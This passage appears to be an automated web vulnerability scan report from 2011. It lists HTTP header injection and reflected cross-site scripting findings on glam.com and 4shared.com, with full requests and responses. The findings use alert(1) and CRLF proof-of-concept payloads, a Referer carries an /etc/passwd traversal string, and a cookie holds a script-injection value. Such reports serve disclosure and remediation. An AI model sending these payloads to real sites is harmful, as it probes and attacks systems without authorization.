Cookie: CurrentROLSession=; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;

Response

HTTP/1.1 301 moved permanently
Content-Type: text/html
Date: Tue, 19 Apr 2011 19:40:35 GMT
Location: http://www.regonline.com/__resources/?8fca8
cb9e5a58209
=1:
Connection: close
Content-Length: 0


4.4. http://www22.glam.com/cTagsImgCmd.act [gname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.glam.com
Path:   /cTagsImgCmd.act

Issue detail

The value of the gname request parameter is copied into the Set-Cookie response header. The payload d8998%0d%0a014a7d990d2 was submitted in the gname parameter. This caused a response containing an injected HTTP header.

Request

GET /cTagsImgCmd.act?gtid=5000000440&gcmd=setc&gexpires=172800&gname=d8998%0d%0a014a7d990d2&gvalue=D,T HTTP/1.1
Host: www22.glam.com
Proxy-Connection: keep-alive
Referer: http://www.glam.com/app/site/affiliate/viewChannelModule.act?mName=viewAdJs../../../../../../../../etc/passwdviewAdJs&affiliateId=0&adSize=300x85
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; __utmb=234602824

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://www35t.glam.com/jsadimp.gif?1^0^553c4931cdd8ccd429f38817a10831b2^116391130334874196611^1^446224^/^1x1^5000000440^31230390^-1^-1^-1^-1^0^0^905413033490113356^p^^0^^US^511^0^0^0^WASHINGTON^0^0^0^0^^d8998
Set-Cookie: d8998
014a7d990d2
=D,T; expires=Sat, 23 Apr 2011 01: 23:31 GMT; path=/; domain=.glam.com;
ETag: "662c9bddfc82c61ba8066514fc2b172e:1276888104"
P3P: policyref="http://www.glammedia.com/about_glam/legal/policy.xml", CP="NON DSP COR PSAo PSDo OUR IND UNI COM NAV STA"
Expires: Thu, 21 Apr 2011 01:23:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:23:31 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

5. Cross-site scripting (reflected)  previous  next
There are 991 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://www.4shared.com/advertise/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adf8c"-alert(1)-"fa2cfce21c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertiseadf8c"-alert(1)-"fa2cfce21c6/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /advertiseadf8c&quot;-alert(1)-&quot;fa2cfce21c6/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D569F2525929105DF9E4B5CBCB35FEB6.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:43 GMT
Connection: close
Content-Length: 36113


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertiseadf8c"-alert(1)-"fa2cfce21c6/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

5.2. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/300x250.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbe69"-alert(1)-"855c7c91d82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertisecbe69"-alert(1)-"855c7c91d82/banners/desktop/300x250.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /advertisecbe69&quot;-alert(1)-&quot;855c7c91d82/banners/desktop/300x250.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:20 GMT
Content-Length: 36336


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertisecbe69"-alert(1)-"855c7c91d82/banners/desktop/300x250.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

5.3. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/300x250.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdfe3"-alert(1)-"24e87bceef2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/bannersbdfe3"-alert(1)-"24e87bceef2/desktop/300x250.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /advertise/bannersbdfe3&quot;-alert(1)-&quot;24e87bceef2/desktop/300x250.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:36 GMT
Content-Length: 36336


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/bannersbdfe3"-alert(1)-"24e87bceef2/desktop/300x250.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

5.4. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/300x250.jsp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e2c5"-alert(1)-"4c8ee2c4559 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/banners/desktop2e2c5"-alert(1)-"4c8ee2c4559/300x250.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /advertise/banners/desktop2e2c5&quot;-alert(1)-&quot;4c8ee2c4559/300x250.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:50 GMT
Content-Length: 36336


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/banners/desktop2e2c5"-alert(1)-"4c8ee2c4559/300x250.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.5. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/300x250.jsp

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24af2"-alert(1)-"972becc4068 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/banners/desktop/300x250.jsp24af2"-alert(1)-"972becc4068 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /advertise/banners/desktop/300x250.jsp24af2&quot;-alert(1)-&quot;972becc4068
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:33:03 GMT
Content-Length: 36336


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/banners/desktop/300x250.jsp24af2"-alert(1)-"972becc4068";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.6. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/728x90.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e997"-alert(1)-"7bb2d897bb0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise3e997"-alert(1)-"7bb2d897bb0/banners/desktop/728x90.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls

Response

HTTP/1.1 404 /advertise3e997&quot;-alert(1)-&quot;7bb2d897bb0/banners/desktop/728x90.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3DAF2D9C428EAB31F61D3BF61A35CD60.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:31:54 GMT
Content-Length: 36320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise3e997"-alert(1)-"7bb2d897bb0/banners/desktop/728x90.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

5.7. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/728x90.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a805f"-alert(1)-"4c476fd3f21 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/bannersa805f"-alert(1)-"4c476fd3f21/desktop/728x90.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls

Response

HTTP/1.1 404 /advertise/bannersa805f&quot;-alert(1)-&quot;4c476fd3f21/desktop/728x90.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BCC54BBB2A80A834314C7F9C9B8CCA67.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:09 GMT
Content-Length: 36331


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/bannersa805f"-alert(1)-"4c476fd3f21/desktop/728x90.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback
...[SNIP]...

5.8. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/728x90.jsp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a31ad"-alert(1)-"d183c0a7079 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/banners/desktopa31ad"-alert(1)-"d183c0a7079/728x90.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls

Response

HTTP/1.1 404 /advertise/banners/desktopa31ad&quot;-alert(1)-&quot;d183c0a7079/728x90.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A9E5C096071D6B340A0CD040F160790B.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:24 GMT
Content-Length: 36331


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/banners/desktopa31ad"-alert(1)-"d183c0a7079/728x90.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.9. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/728x90.jsp

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0759"-alert(1)-"b5db9f6f713 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/banners/desktop/728x90.jspe0759"-alert(1)-"b5db9f6f713 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls

Response

HTTP/1.1 404 /advertise/banners/desktop/728x90.jspe0759&quot;-alert(1)-&quot;b5db9f6f713
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=78F6ABDF9E1F83884170846AE905EE6D.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:39 GMT
Content-Length: 36331


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/banners/desktop/728x90.jspe0759"-alert(1)-"b5db9f6f713";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.10. http://www.4shared.com/contact.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /contact.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dabbb"-alert(1)-"c3f9028a5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contact.jspdabbb"-alert(1)-"c3f9028a5f HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /contact.jspdabbb&quot;-alert(1)-&quot;c3f9028a5f
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B7605F5D00D0FE3651D892172B7D724A.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:43 GMT
Connection: close
Content-Length: 36102


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/contact.jspdabbb"-alert(1)-"c3f9028a5f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.11. http://www.4shared.com/css/common.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/common.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf1a6"-alert(1)-"93e9e1ca1ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

